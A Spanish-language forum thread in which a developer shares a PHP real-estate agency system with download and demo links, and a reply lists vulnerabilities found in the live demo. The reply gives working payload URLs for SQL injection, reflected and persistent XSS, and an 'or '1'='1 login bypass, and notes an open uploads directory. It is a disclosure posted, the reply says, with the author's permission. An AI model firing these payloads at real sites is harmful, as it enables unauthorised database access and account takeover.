(http://imageshack.com/a/img842/8629/14tw.png)
Buenas compañeros os traigo un sistema de agencias inmobiliarias en PHP que yo mismo desarolle, espero que lo puedan aplicar en su Pais/Ciudad y le saquen mucho dinero, yo ya libre 1500 dolares vendiendolo en mi ciudad a 3 agencias de inmuebles/arrendamientos.
La idea es seguir actualizando el sistema y sacar versiones 2.0, 3.0 y asi sucesivamente, manteniendo siempre el sistema en modalidad open source.
Descarga MegA: _inmobiliaria.rar (4.4MB)https://mega.co.nz/#!EtYlmQIT!dSgh-lDd7haVIQUrMv6a6uOXLmTObgYsrbqmwheTjjw (https://mega.co.nz/#!EtYlmQIT!dSgh-lDd7haVIQUrMv6a6uOXLmTObgYsrbqmwheTjjw)
Descarga 4Shared: _inmobiliaria.rar (4.4MB)http://www.4shared.com/rar/rLGmRazace/_inmobiliaria_underc0deorg_.html
Contenido del paquete:(http://imageshack.com/a/img836/6820/n1zw.png)
El sistema demo esta montado aca: http://www.phpdatagrids.com/inmobiliaria/
Dentro del paquete comprimido esta el manual de como usar el sistema demo.
Leer el mensaje de abajo.
Muchas gracias por el aporte graphixx!!!
Descargando y probando! ;D
Un saludo.
Vulnerabilidades encontradasSQLi --> http://www.phpdatagrids.com/inmobiliaria/index_vista_inmueble.php?codigo=%27
XSS --> http://www.phpdatagrids.com/inmobiliaria/index_vista_inmueble.php?codigo=%3Ch1%3EXSS%3C/h1%3E%3Cimg%20src=x%20onerror=prompt%28/Blackdrake/%29%3E
Directory Listing --> http://www.phpdatagrids.com/inmobiliaria/fotos/admin/uploads/
Vulnerabilidad en el Panel de administración --> http://www.phpdatagrids.com/inmobiliaria/admin_editar/
Inyección 'or '1'='1
Puesto a que entramos al panel de administración podemos insertar xss persistente:
http://www.phpdatagrids.com/inmobiliaria/index_vista_inmueble.php?codigo=529
Eso es todo lo que he encontrado, tampoco he estado mucho tiempo buscando.
Cabe destacar que lo posteo aquí con permiso del usuario, que quiso que todos vieseis las vulnerabilidades.
Un saludo.
Blackdrake